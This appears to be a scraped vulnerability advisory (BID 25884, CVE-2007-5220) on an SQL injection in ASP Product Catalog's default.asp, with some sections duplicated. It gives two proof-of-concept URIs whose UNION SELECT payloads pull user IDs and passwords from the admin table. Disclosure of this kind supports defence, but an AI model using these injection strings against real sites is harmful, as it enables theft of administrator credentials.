ASP Product Catalog Default.ASP SQL Injection Vulnerability
BID:25884
Info
ASP Product Catalog Default.ASP SQL Injection Vulnerability
| Bugtraq ID: | 25884 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5220 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 01 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
ASP Product Catalog ASP Product Catalog 1.0 Beta 1 ASP Product Catalog ASP Product Catalog 1.0 |
| Not Vulnerable: | |
Discussion
ASP Product Catalog Default.ASP SQL Injection Vulnerability
ASP Product Catalog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ASP Product Catalog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
ASP Product Catalog Default.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/Catalog/default.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin#
http://www.example.comdefault.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/Catalog/default.asp?cid=8%20union%20all%20select%20Password,User_ID,Password,User_ID,Password,User_ID,Password%20from%20admin#
http://www.example.comdefault.asp?cid=-999 union select 0,user_id,password,3,4,5 from admin
Solution / Fix
ASP Product Catalog Default.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ASP Product Catalog Default.ASP SQL Injection Vulnerability
References:
References: